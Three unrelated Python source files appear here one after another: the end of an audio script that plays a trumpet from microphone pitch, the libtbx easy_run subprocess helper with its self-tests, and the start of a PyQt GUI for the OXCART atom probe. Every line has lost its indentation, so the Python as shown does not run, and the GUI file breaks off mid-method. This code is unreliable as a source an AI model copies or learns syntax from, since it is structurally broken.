__FORMAT__ = pa.paInt16
__CHANNELS__ = 1
__RATE__ = rate
__DEV_INDEX__ = dev_idx
# Open and start a pyaudio audio stream
audio = pa.PyAudio()
stream = audio.open(format = __FORMAT__,
channels = __CHANNELS__,
frames_per_buffer = __CHUNK__,
input = True,
input_device_index = __DEV_INDEX__,
rate = __RATE__)
# Setup a filter to run over the time domain information. Cutoff at 1kHz
filter_order = 255
filter_cutoff = 1000.0 / (__RATE__/2.0)#Hz
fir = sp.signal.firwin(filter_order + 1, filter_cutoff)
N = 16 # downsampling coefficient
# Setup index to frequency mapping (taking into account downsampling)
freqs = np.linspace(0,__RATE__/(2*N), __CHUNK__/(2*N))
# Start audiostream
stream.start_stream()
prev_block = []  # last good block, reused if a stream read fails
while trumpet_state.get_state() == trumpet_state.RUNNING:
try:
# Retrieve stream data.
block = stream.read(__CHUNK__)
prev_block = block
except KeyboardInterrupt:
raise
except:
print "dropped"
block = prev_block
# turn block of binary data into an array of ints that can be
# processed using scipy and numpy
data = block2short(block)
# Apply anti-aliasing low pass filter with cutoff of 1kHz
data_filt = sp.signal.lfilter(fir, 1.0, data)
# Subsample by 16 to go from 44100 Hz to about 2756 Hz.
# This is much closer to the sampling rate an embedded device might
# have, considering that we don't actually need to see frequencies above
# 1 kHz or so.
data_ds = data_filt[0::N]
# Take the FFT and extract the magnitude.
mag = abs(np.fft.rfft(data_ds))
# Find the max frequency spike. Let us just sort of assume this is
# in the frequency range of the harmonic we want to play. This
# appears to be mostly accurate for trumpet mouthpieces. Completely
# inaccurate for whistling though.
trumpet_state.write_frequency(freqs[np.where(mag == max(mag))])
# Stop and close the stream then exit the function when the
# state changes.
stream.stop_stream()
stream.close()
audio.terminate()
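# Hypothetical helper equivalent to the peak-pick step inside the loop above: the
# dominant frequency is simply the FFT bin with the largest magnitude, and
# np.argmax returns the same index as np.where(mag == max(mag)).
def _dominant_frequency(mag, freqs):
    """Return the frequency (Hz) of the strongest spectral bin."""
    return freqs[np.argmax(mag)]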
if __name__ == '__main__':
cli_argparser = argparse.ArgumentParser(description='Play trumpet using your computer')
cli_argparser.add_argument('-s', '--soundfont',
action='store', default='default.sf2')
cli_argparser.add_argument('-d', '--dev-idx',
action='store', default='3')
cli_argparser.add_argument('-r', '--rate',
action='store', default='44100')
cli_args = cli_argparser.parse_args(sys.argv[1:])
# Initialize Trumpet and TrumpetDisplay
tpt = Trumpet(cli_args.soundfont)
trumpet_state = TrumpetState()
disp = TrumpetDisplay(trumpet_state)
# Start state variables for frequency and run_state. These will
# be updated inside of the audio_processing_worker "function"/process.
# Start running the audio_processing_worker function as a process with shared memory
# (run_state) and freq. for freq audio_processing_worker is a producer and nothing
# else should write to freq. However, for run_state it is a consumer and
# does not write to it. The process will exit when run_state becomes false.
input_tone_p = Process(target=audio_processing_worker, args=(trumpet_state, int(cli_args.dev_idx), int(cli_args.rate)))
input_tone_p.start()
try:
while trumpet_state.get_state() == trumpet_state.RUNNING:
disp.update_display(tpt)
finally:
# Clean
print "Cleaning Up",
input_tone_p.join()
print "!!",
tpt.stop_Note()
print "!!!"
disp.cleanup()
print "Exiting. Have a nice day."
|
easy_run.py
|
from __future__ import absolute_import, division, print_function
import os
import subprocess
import sys
import threading
import signal
from six.moves import range
def _show_lines(lines, out, prefix):
if (out is None): out = sys.stdout
for line in lines:
print(prefix+line, file=out)
def macos_dyld():
'''
Convenience function for returning either DYLD_LIBRARY_PATH or
DYLD_FALLBACK_LIBRARY_PATH (for conda environments)
'''
dyld_options = ['DYLD_LIBRARY_PATH', 'DYLD_FALLBACK_LIBRARY_PATH']
for dyld in dyld_options:
dyld_path = os.environ.get(dyld)
if (dyld_path is not None):
return '%s="%s"' % (dyld, dyld_path)
return 'DYLD_LIBRARY_PATH= '
class fully_buffered_base(object):
def format_errors_if_any(self):
assert not self.join_stdout_stderr
if (len(self.stderr_lines) != 0):
msg = ["child process stderr output:"]
msg.append(" command: " + repr(self.command))
for line in self.stderr_lines:
msg.append(" " + line)
return "\n".join(msg)
if (self.return_code != 0):
return "non-zero return code: %s"%(self.return_code)
return None
def raise_if_errors(self, Error=RuntimeError):
assert not self.join_stdout_stderr
msg = self.format_errors_if_any()
if (msg is not None):
raise Error(msg)
return self
def raise_if_output(self, show_output_threshold=10, Error=RuntimeError):
def start_msg():
result = ["unexpected child process output:"]
result.append(" command: " + repr(self.command))
return result
if (self.stdout_buffer is not None):
if (len(self.stdout_buffer) != 0):
msg = start_msg()
msg.append(" length of output: %d bytes" % len(self.stdout_buffer))
raise Error("\n".join(msg))
elif (len(self.stdout_lines) != 0):
msg = start_msg()
for line in self.stdout_lines[:show_output_threshold]:
msg.append(" " + line)
n = len(self.stdout_lines)
if (n > show_output_threshold):
if (n <= show_output_threshold+2):
for line in self.stdout_lines[show_output_threshold:n]:
msg.append(" " + line)
else:
msg.append(" ...")
msg.append(" remaining %d lines omitted."
% (n-show_output_threshold))
raise Error("\n".join(msg))
return self
def raise_if_errors_or_output(self, Error=RuntimeError):
self.raise_if_errors(Error=Error)
self.raise_if_output(Error=Error)
return self
def show_stderr(self, out=None, prefix=""):
_show_lines(lines=self.stderr_lines, out=out, prefix=prefix)
def show_stdout(self, out=None, prefix=""):
assert self.stdout_lines is not None
_show_lines(lines=self.stdout_lines, out=out, prefix=prefix)
class fully_buffered_simple(fully_buffered_base):
"""\
Executes command, sends stdin_lines (str or sequence), then reads
stdout_lines first, stderr_lines second (if join_stdout_stderr
is False).
The constructor may deadlock if the I/O buffers are too small to allow
the blocking write and reads in the given sequence. Specifically,
stdin_lines may be too big, or there may be too many stderr_lines,
but there can be any number of stdout_lines. The tests below are
known to work under Mac OS X, Windows XP, IRIX, and Tru64 Unix with
stdin_lines up to 1000000, stderr_lines up to 500. I.e. this simple
implementation should cover most practical situations.
"""
def __init__(self,
command,
stdin_lines=None,
join_stdout_stderr=False,
stdout_splitlines=True,
bufsize=-1):
self.command = command
self.join_stdout_stderr = join_stdout_stderr
if (join_stdout_stderr):
child_stdin, child_stdout = os.popen4(command, "t", bufsize)
child_stderr = None
else:
child_stdin, child_stdout, child_stderr = os.popen3(command,"t",bufsize)
if (stdin_lines is not None):
if (not isinstance(stdin_lines, str)):
stdin_lines = '\n'.join(stdin_lines)
if (len(stdin_lines) != 0):
stdin_lines += '\n'
child_stdin.write(stdin_lines)
child_stdin.close()
if (stdout_splitlines):
self.stdout_buffer = None
self.stdout_lines = child_stdout.read().splitlines()
else:
self.stdout_buffer = child_stdout.read()
self.stdout_lines = None
if (child_stderr is not None):
self.stderr_lines = child_stderr.read().splitlines()
else:
self.stderr_lines = []
child_stdout.close()
if (child_stderr is not None):
child_stderr.close()
self.return_code = None
class fully_buffered_subprocess(fully_buffered_base):
"This implementation is supposed to never block."
def __init__(self,
command,
timeout=None,
stdin_lines=None,
join_stdout_stderr=False,
stdout_splitlines=True,
bufsize=-1):
def target(process, lines, result):
o, e = process.communicate(input=lines)
result[0] = o
result[1] = e
self.command = command
self.join_stdout_stderr = join_stdout_stderr
if (not isinstance(command, str)):
command = subprocess.list2cmdline(command)
# Timeout functionality based on:
# https://stackoverflow.com/questions/1191374/using-module-subprocess-with-timeout
# https://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true
if (sys.platform == 'darwin'): # bypass SIP on OS X 10.11
command = ('%s exec ' % macos_dyld()) + command
if (stdin_lines is not None):
if (not isinstance(stdin_lines, str)):
stdin_lines = '\n'.join(stdin_lines)
if (len(stdin_lines) != 0):
stdin_lines += '\n'
if (join_stdout_stderr):
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(
args=command,
shell=True,
bufsize=bufsize,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=stderr,
universal_newlines=True,
close_fds=(sys.platform != 'win32'),
preexec_fn=os.setsid if sys.platform != 'win32' else None)
if timeout is not None:
if sys.platform != 'win32':
r = [None, None]
thread = threading.Thread(target=target, args=(p, stdin_lines, r))
thread.start()
thread.join(timeout)
if thread.is_alive():
os.killpg(os.getpgid(p.pid), signal.SIGTERM)
thread.join()
o, e = r[0], r[1]
else: # sys.platform == 'win32'
# don't respect timeout for now
o, e = p.communicate(input=stdin_lines)
else:
o, e = p.communicate(input=stdin_lines)
if (stdout_splitlines):
self.stdout_buffer = None
self.stdout_lines = o.splitlines()
else:
self.stdout_buffer = o
self.stdout_lines = None
if (join_stdout_stderr):
self.stderr_lines = []
else:
self.stderr_lines = e.splitlines()
self.return_code = p.returncode
fully_buffered = fully_buffered_subprocess
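# Typical usage (illustrative only; the same patterns are exercised in exercise()
# below):
#   result = fully_buffered(command="echo hello").raise_if_errors()
#   assert result.stdout_lines == ["hello"]
#   result = go("wc -l", stdin_lines=["a", "b"])  # stdout and stderr joined
#   print(result.return_code)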
def go(command, stdin_lines=None,join_stdout_stderr=True):
return fully_buffered(
command=command,
stdin_lines=stdin_lines,
join_stdout_stderr=join_stdout_stderr)
def call(command):
"""
Wraps subprocess.call to run a command.
Parameters
----------
command : str
Returns
-------
int
Exit code of subprocess.
Examples
--------
>>> from libtbx.easy_run import call
>>> ret = call("echo 1")
1
>>> print(ret)
0
"""
for s in [sys.stdout, sys.stderr]:
flush = getattr(s, "flush", None)
if (flush is not None): flush()
if (sys.platform == 'darwin'): # bypass SIP on OS X 10.11
command = ('%s exec ' % macos_dyld()) + command
return subprocess.call(args=command, shell=True)
def exercise(args=None):
from six.moves import cStringIO as StringIO
# Note: Exception_expected (raised below when an expected error does not occur)
# is assumed to come from libtbx.test_utils.
from libtbx.test_utils import Exception_expected
if (args is None): args = sys.argv[1:]
verbose = "--verbose" in args
#
if ("--simple" in args):
fb = fully_buffered_simple
else:
fb = fully_buffered
#
for command in ["echo hello world", ("echo", "hello", "world")]:
for result in [fb(command=command).raise_if_errors(),
fb(command=command, join_stdout_stderr=True),
go(command=command)]:
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["hello world"]
#
if (os.path.isfile("/bin/ls")):
for command in ["/bin/ls /bin", ("/bin/ls", "/bin")]:
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert "ls" in result.stdout_lines
if (os.path.isfile("/usr/bin/wc")):
for command in ["/usr/bin/wc -l", ("/usr/bin/wc", "-l")]:
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["0"]
result = fb(command=command, stdin_lines=["hello"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["1"]
result = fb(command=command, stdin_lines=["hello", "world"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["2"]
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["3"]
#
if (os.name == "nt"):
result = fb(command="dir").raise_if_errors()
if verbose: print(result.stdout_lines)
assert len(result.stdout_lines) > 0
windir = os.environ.get("windir", None)
if (windir is not None and windir.find(" ") < 0):
result = fb(command="dir "+windir).raise_if_errors()
if verbose: print(result.stdout_lines)
assert len(result.stdout_lines) > 0
#
pyexe = sys.executable
assert pyexe.count('"') == 0
pyexe = '"' + pyexe + '"'
if (os.name == "nt"):
pyexe = "call " + pyexe
#
if ("PYTHONPATH" in os.environ):
if (not hasattr(os, "unsetenv")):
os.environ["PYTHONPATH"] = ""
else:
del os.environ["PYTHONPATH"]
if (os.name == "nt"):
result = fb(command="set").raise_if_errors()
elif (os.path.isfile("/usr/bin/printenv")):
result = fb(command="/usr/bin/printenv").raise_if_errors()
else:
result = None
if (result is not None):
if verbose: print(result.stdout_lines)
for line in result.stdout_lines:
assert not line.startswith("PYTHONPATH") or line == "PYTHONPATH="
#
for stdout_splitlines in [True, False]:
result = fb(
command="%s -V" % pyexe,
stdout_splitlines=stdout_splitlines)
# python -V outputs to stdout or stderr depending on version
# https://bugs.python.org/issue18338
if (len(result.stderr_lines) > 0):
if verbose: print(result.stderr_lines)
assert result.stderr_lines[0].startswith(
"Python " + sys.version.split()[0])
if (stdout_splitlines):
assert result.stdout_buffer is None
assert result.stdout_lines == []
else:
assert result.stdout_buffer == ""
assert result.stdout_lines is None
else:
if verbose: print(result.stdout_lines)
if (stdout_splitlines):
assert result.stdout_buffer is None
assert result.stdout_lines[0].startswith(
"Python " + sys.version.split()[0])
else:
assert result.stdout_buffer.startswith(
"Python " + sys.version.split()[0])
assert result.stdout_lines is None
result = go(command="%s -V" % pyexe)
if verbose: print(result.stdout_lines)
assert result.stdout_lines[0].startswith("Python " + sys.version.split()[0])
result = fb(
command='%s -c "print(3+4)"' % pyexe).raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["7"]
command = pyexe \
+ ' -c "import sys; print(len(list(filter(bool, sys.stdin.read().splitlines()))))"'
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["0"]
result = fb(command=command, stdin_lines=["hello"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["1"]
result = fb(command=command, stdin_lines=["hello", "world"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["2"]
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["3"]
if ("--quick" in args):
n_lines_o = 10000
else:
n_lines_o = 1000000
if (fb is fully_buffered_simple):
n_lines_e = 500 # Windows blocks if this value is greater than 701
else:
n_lines_e = 10000
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == [str(n_lines_o)]
command = pyexe \
+ ' -c "import sys; sys.stderr.write(sys.stdin.read())"'
result = fb(command=command, stdin_lines="Hello\nWorld\nBye\n") \
.raise_if_output()
s = StringIO()
result.show_stderr(out=s, prefix="%(")
if verbose: sys.stdout.write(s.getvalue())
assert s.getvalue() == """\
%(Hello
%(World
%(Bye
"""
cat_command = command = pyexe \
+ ' -c "import sys; sys.stdout.write(sys.stdin.read())"'
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
s = StringIO()
result.show_stdout(out=s, prefix=">:")
if verbose: sys.stdout.write(s.getvalue())
assert s.getvalue() == """\
>:hello
>:world
>:bye
"""
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)]) \
.raise_if_errors()
result.stdout_lines = list(filter(bool, result.stdout_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
assert len(result.stdout_lines) == n_lines_o
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == [str(s)
for s in range(n_lines_o-5, n_lines_o)]
command = pyexe \
+ ' -c "import sys; sys.stderr.write(sys.stdin.read())"'
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_e,0,-1)])
assert len(result.stdout_lines) == 0
result.stderr_lines = list(filter(bool, result.stderr_lines))
if verbose: print(result.stderr_lines[:5], result.stderr_lines[-5:])
assert len(result.stderr_lines) == n_lines_e
assert result.stderr_lines[:5] == [str(s)
for s in range(n_lines_e, n_lines_e-5, -1)]
assert result.stderr_lines[-5:] == ["5","4","3","2","1"]
command = pyexe + "; ".join((''' -c "\
import sys, os
lines = sys.stdin.read()
sys.stdout.write(lines)
sys.stdout.flush()
lines = list(filter(bool, lines.splitlines()))[:%d]
lines.reverse()
nl = chr(%d)
sys.stderr.write(nl.join(lines)+nl)
sys.stderr.flush()"''' % (n_lines_e, ord("\n"))).splitlines())
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)])
result.stdout_lines = list(filter(bool, result.stdout_lines))
result.stderr_lines = list(filter(bool, result.stderr_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
if verbose: print(result.stderr_lines[:5], result.stderr_lines[-5:])
assert len(result.stdout_lines) == n_lines_o
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == [str(s)
for s in range(n_lines_o-5, n_lines_o)]
assert len(result.stderr_lines) == n_lines_e
assert result.stderr_lines[:5] == [str(s)
for s in range(n_lines_e-1, n_lines_e-6, -1)]
assert result.stderr_lines[-5:] == ["4","3","2","1","0"]
result = go(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)])
result.stdout_lines = list(filter(bool, result.stdout_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
assert len(result.stdout_lines) == n_lines_o + n_lines_e
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == ["4","3","2","1","0"]
#
try: fb(command="C68649356116218352").raise_if_errors()
except RuntimeError as e:
if verbose: print(e)
# Just check for RuntimeError; there are now additional
# specific error messages.
pass
# assert str(e).startswith("child process stderr output:\n")
else: raise Exception_expected
#
for stdout_splitlines in [True, False]:
for n,b in [(10,20),(11,23),(12,26),(13,29)]:
try:
fb(
command=cat_command,
stdin_lines=[str(i) for i in range(n)],
stdout_splitlines=stdout_splitlines).raise_if_output()
except RuntimeError as e:
if verbose: print(e)
assert str(e).startswith("unexpected child process output:\n")
if (stdout_splitlines):
if (n != 13):
assert str(e).endswith(str(n-1))
else:
assert str(e).endswith(" remaining 3 lines omitted.")
else:
assert str(e).endswith(" length of output: %d bytes" % b)
else: raise Exception_expected
#
fb(command=cat_command).raise_if_errors_or_output()
#
result = fb(command=["nslookup", "localhost"])
if verbose:
print(result.stdout_lines)
print(result.stderr_lines)
#
while ("--forever" in args): pass
#
print("OK")
if (__name__ == "__main__"):
exercise()
|
gui.py
|
"""
This is the main script of the main GUI of the OXCART Atom Probe.
@author: Mehrpad Monajem <mehrpad.monajem@fau.de>
"""
import sys
import numpy as np
import nidaqmx
import time
import threading
import datetime
import os
# PyQt and PyQtgraph libraries
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QScreen, QPixmap, QImage
import pyqtgraph as pg
import pyqtgraph.exporters
# Serial ports and Camera libraries
import serial.tools.list_ports
from pypylon import pylon
# Local project scripts
import oxcart
import variables
from devices.camera import Camera
from devices import initialize_devices
class Ui_OXCART(Camera, object):
"""
The GUI class of the OXCART atom probe.
"""
def __init__(self, devices, tlFactory, cameras, converter, lock):
super().__init__(devices, tlFactory, cameras, converter) # Cameras variables and converter
self.lock = lock # Lock for thread ...
def setupUi(self, OXCART):
OXCART.setObjectName("OXCART")
OXCART.resize(3400, 1800)
self.centralwidget = QtWidgets.QWidget(OXCART)
self.centralwidget.setObjectName("centralwidget")
# self.vdc_time = QtWidgets.QWidget(self.centralwidget)
self.vdc_time = pg.PlotWidget(self.centralwidget)
self.vdc_time.setGeometry(QtCore.QRect(530, 260, 500, 500))
self.vdc_time.setObjectName("vdc_time")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(730, 210, 80, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.layoutWidget = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget.setGeometry(QtCore.QRect(3030, 1520, 314, 106))
self.layoutWidget.setObjectName("layoutWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.start_button = QtWidgets.QPushButton(self.layoutWidget)
self.start_button.setObjectName("start_button")
self.gridLayout_2.addWidget(self.start_button, 1, 0, 1, 1)
self.stop_button = QtWidgets.QPushButton(self.layoutWidget)
self.stop_button.setObjectName("stop_button")
self.gridLayout_2.addWidget(self.stop_button, 2, 0, 1, 1)
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(1230, 210, 156, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
# self.detection_rate_viz = QtWidgets.QWidget(self.centralwidget)
self.detection_rate_viz = pg.PlotWidget(self.centralwidget)
self.detection_rate_viz.setGeometry(QtCore.QRect(1080, 260, 500, 500))
self.detection_rate_viz.setObjectName("detection_rate_viz")
self.label_19 = QtWidgets.QLabel(self.centralwidget)
self.label_19.setGeometry(QtCore.QRect(710, 830, 134, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_19.setFont(font)
self.label_19.setObjectName("label_19")
###
# self.visualization = QtWidgets.QWidget(self.centralwidget)
self.visualization = pg.PlotWidget(self.centralwidget)
self.visualization.setGeometry(QtCore.QRect(530, 870, 500, 500))
self.visualization.setObjectName("visualization")
self.detector_circle = pg.QtGui.QGraphicsEllipseItem(0, 0, 2400, 2400) # x, y, width, height
self.detector_circle.setPen(pg.mkPen(color=(255, 0, 0), width=1))
self.visualization.addItem(self.detector_circle)
###
self.label_24 = QtWidgets.QLabel(self.centralwidget)
self.label_24.setGeometry(QtCore.QRect(1280, 820, 51, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_24.setFont(font)
self.label_24.setObjectName("label_24")
# self.temperature = QtWidgets.QWidget(self.centralwidget)
self.temperature = pg.PlotWidget(self.centralwidget)
self.temperature.setGeometry(QtCore.QRect(2530, 1400, 411, 311))
self.temperature.setObjectName("temperature")
self.label_18 = QtWidgets.QLabel(self.centralwidget)
self.label_18.setGeometry(QtCore.QRect(10, 1150, 101, 41))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_18.setFont(font)
self.label_18.setObjectName("label_18")
self.Error = QtWidgets.QLabel(self.centralwidget)
self.Error.setGeometry(QtCore.QRect(530, 1400, 1241, 51))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
font.setStrikeOut(False)
self.Error.setFont(font)
self.Error.setAlignment(QtCore.Qt.AlignCenter)
self.Error.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.Error.setObjectName("Error")
self.diagram = QtWidgets.QLabel(self.centralwidget)
self.diagram.setGeometry(QtCore.QRect(10, 1190, 481, 371))
self.diagram.setText("")
self.diagram.setObjectName("diagram")
self.label_29 = QtWidgets.QLabel(self.centralwidget)
self.label_29.setGeometry(QtCore.QRect(1810, 830, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_29.setFont(font)
self.label_29.setObjectName("label_29")
self.label_30 = QtWidgets.QLabel(self.centralwidget)
self.label_30.setGeometry(QtCore.QRect(1810, 230, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_30.setFont(font)
self.label_30.setObjectName("label_30")
self.label_31 = QtWidgets.QLabel(self.centralwidget)
self.label_31.setGeometry(QtCore.QRect(2700, 840, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_31.setFont(font)
self.label_31.setObjectName("label_31")
self.label_32 = QtWidgets.QLabel(self.centralwidget)
self.label_32.setGeometry(QtCore.QRect(2700, 220, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_32.setFont(font)
self.label_32.setObjectName("label_32")
self.label_33 = QtWidgets.QLabel(self.centralwidget)
self.label_33.setGeometry(QtCore.QRect(2220, 800, 171, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_33.setFont(font)
self.label_33.setObjectName("label_33")
self.label_34 = QtWidgets.QLabel(self.centralwidget)
self.label_34.setGeometry(QtCore.QRect(2200, 190, 171, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_34.setFont(font)
self.label_34.setObjectName("label_34")
self.light = QtWidgets.QPushButton(self.centralwidget)
self.light.setGeometry(QtCore.QRect(3120, 50, 101, 46))
self.light.setObjectName("light")
self.led_light = QtWidgets.QLabel(self.centralwidget)
self.led_light.setGeometry(QtCore.QRect(3240, 40, 111, 61))
self.led_light.setAlignment(QtCore.Qt.AlignCenter)
self.led_light.setObjectName("led_light")
self.vacuum_main = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_main.setGeometry(QtCore.QRect(2270, 1510, 231, 91))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.vacuum_main.setFont(font)
self.vacuum_main.setObjectName("vacuum_main")
self.vacuum_buffer = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_buffer.setGeometry(QtCore.QRect(1780, 1500, 231, 91))
font = QtGui.QFont()
font.setPointSize(8)
self.vacuum_buffer.setFont(font)
self.vacuum_buffer.setObjectName("vacuum_buffer")
self.vacuum_load_lock = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_load_lock.setGeometry(QtCore.QRect(1190, 1500, 231, 91))
self.vacuum_load_lock.setObjectName("vacuum_load_lock")
self.label_35 = QtWidgets.QLabel(self.centralwidget)
self.label_35.setGeometry(QtCore.QRect(2020, 1540, 241, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_35.setFont(font)
self.label_35.setObjectName("label_35")
self.label_36 = QtWidgets.QLabel(self.centralwidget)
self.label_36.setGeometry(QtCore.QRect(1490, 1540, 251, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_36.setFont(font)
self.label_36.setObjectName("label_36")
self.label_37 = QtWidgets.QLabel(self.centralwidget)
self.label_37.setGeometry(QtCore.QRect(980, 1540, 181, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_37.setFont(font)
self.label_37.setObjectName("label_37")
self.label_38 = QtWidgets.QLabel(self.centralwidget)
self.label_38.setGeometry(QtCore.QRect(2050, 1650, 191, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_38.setFont(font)
self.label_38.setObjectName("label_38")
self.temp = QtWidgets.QLCDNumber(self.centralwidget)
self.temp.setGeometry(QtCore.QRect(2270, 1620, 231, 91))
self.temp.setObjectName("temp")
####
# self.cam_s_o = QtWidgets.QLabel(self.centralwidget)
self.cam_s_o = pg.ImageView(self.centralwidget)
self.cam_s_o.adjustSize()
self.cam_s_o.ui.histogram.hide()
self.cam_s_o.ui.roiBtn.hide()
self.cam_s_o.ui.menuBtn.hide()
self.cam_s_o.setGeometry(QtCore.QRect(1630, 260, 500, 500))
# self.cam_s_o.setText("")
self.cam_s_o.setObjectName("cam_s_o")
# self.cam_b_o = QtWidgets.QLabel(self.centralwidget)
self.cam_b_o = pg.ImageView(self.centralwidget)
self.cam_b_o.adjustSize()
self.cam_b_o.ui.histogram.hide()
self.cam_b_o.ui.roiBtn.hide()
self.cam_b_o.ui.menuBtn.hide()
self.cam_b_o.setGeometry(QtCore.QRect(1630, 870, 500, 500))
# self.cam_b_o.setText("")
####
self.cam_b_o.setObjectName("cam_b_o")
self.cam_s_d = QtWidgets.QLabel(self.centralwidget)
self.cam_s_d.setGeometry(QtCore.QRect(2150, 260, 1200, 500))
self.cam_s_d.setText("")
self.cam_s_d.setObjectName("cam_s_d")
self.cam_b_d = QtWidgets.QLabel(self.centralwidget)
self.cam_b_d.setGeometry(QtCore.QRect(2150, 870, 1200, 500))
self.cam_b_d.setText("")
self.cam_b_d.setObjectName("cam_b_d")
self.layoutWidget1 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget1.setGeometry(QtCore.QRect(650, 1580, 235, 131))
self.layoutWidget1.setObjectName("layoutWidget1")
self.gridLayout_6 = QtWidgets.QGridLayout(self.layoutWidget1)
self.gridLayout_6.setContentsMargins(0, 0, 0, 0)
self.gridLayout_6.setObjectName("gridLayout_6")
self.led_pump_load_lock = QtWidgets.QLabel(self.layoutWidget1)
self.led_pump_load_lock.setAlignment(QtCore.Qt.AlignCenter)
self.led_pump_load_lock.setObjectName("led_pump_load_lock")
self.gridLayout_6.addWidget(self.led_pump_load_lock, 0, 0, 2, 1)
self.pump_load_lock_switch = QtWidgets.QPushButton(self.layoutWidget1)
self.pump_load_lock_switch.setObjectName("pump_load_lock_switch")
self.gridLayout_6.addWidget(self.pump_load_lock_switch, 2, 0, 1, 1)
# self.histogram = QtWidgets.QWidget(self.centralwidget)
self.histogram = pg.PlotWidget(self.centralwidget)
self.histogram.setGeometry(QtCore.QRect(1080, 870, 500, 500))
self.histogram.setObjectName("histogram")
self.label_40 = QtWidgets.QLabel(self.centralwidget)
self.label_40.setGeometry(QtCore.QRect(1480, 1640, 291, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_40.setFont(font)
self.label_40.setObjectName("label_40")
self.vacuum_buffer_back = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_buffer_back.setGeometry(QtCore.QRect(1780, 1610, 231, 91))
font = QtGui.QFont()
font.setPointSize(8)
self.vacuum_buffer_back.setFont(font)
self.vacuum_buffer_back.setObjectName("vacuum_buffer_back")
self.vacuum_load_lock_back = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_load_lock_back.setGeometry(QtCore.QRect(1190, 1610, 231, 91))
self.vacuum_load_lock_back.setObjectName("vacuum_load_lock_back")
self.label_39 = QtWidgets.QLabel(self.centralwidget)
self.label_39.setGeometry(QtCore.QRect(950, 1640, 231, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_39.setFont(font)
self.label_39.setObjectName("label_39")
self.layoutWidget2 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget2.setGeometry(QtCore.QRect(20, 1580, 476, 131))
self.layoutWidget2.setObjectName("layoutWidget2")
self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget2)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
